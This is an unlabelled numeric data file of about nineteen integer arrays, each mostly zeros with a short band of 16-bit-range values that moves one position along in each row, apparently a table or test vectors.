[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 13328, 32388, 62785, 9958, 5126, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 10240, 2560, 21120, 24736, 27944, 52490, 49325],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 64528, 58756, 3137, 37862, 37126, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 64512, 24320, 12224, 65008, 26364, 8799, 15860],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 50192, 19588, 9025, 230, 3590, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 38912, 9728, 55680, 33376, 408, 1159],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 30784, 35856, 45956, 14913, 28134, 35590, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 20480, 37888, 34048, 26944, 57424, 58004, 61829, 14678],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 18496, 21520, 6788, 20801, 56038, 2054, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 24576, 55296, 13824, 15744, 50016, 48088, 21814, 17],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 6208, 7184, 33156, 26689, 18406, 34054, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 45056, 27648, 64256, 14016, 18352, 59244, 12539, 37416],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 59456, 58384, 59524, 32577, 46310, 518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 30976, 54848, 1936, 37732, 57803],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 47168, 44048, 20356, 38465, 8678, 32518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 19472, 31620, 29249, 47338],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 34880, 29712, 46724, 44353, 36582, 64518, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 34816, 41472, 47232, 2592, 25480, 2978, 1077],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 22592, 15376, 7556, 50241, 64486, 30982, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 55040, 3520, 17776, 62684, 6871, 47644],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 10304, 1040, 33924, 56129, 26854, 62982, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 28672, 56320, 38656, 24000, 29040, 36303],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 63552, 52240, 60292, 62017, 54758, 29446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 53248, 29696, 15616, 55104, 52176, 31092, 50237, 24126],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 51264, 37904, 21124, 2369, 17126, 61446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 57344, 14336, 19968, 50048, 62688, 37944, 48206, 4377],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 38976, 23568, 47492, 8257, 45030, 27910, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 12288, 19456, 62208, 46272, 46896, 32588, 39923, 18896],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 26688, 9232, 8324, 14145, 7398, 59910, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 20224, 56256, 13552, 1980, 11411],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 14400, 60432, 34692, 20033, 35302, 26374, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 36864, 25600, 30976, 1600, 8080, 19556, 50041, 7506],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 2112, 46096, 61060, 25921, 63206, 58374, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 40960, 59392, 14848, 24192, 17312, 32232, 29498, 10941],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 55360, 31760, 21892, 31809, 25574, 24838, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 49152, 61440, 48128, 20224, 11200, 23792, 30396, 45135, 38212],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 16384, 4096, 33792, 16640, 43072, 17424, 48260, 37697, 53478, 56838, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 32768, 8192, 18432, 53760, 25728, 15648, 584, 41495],
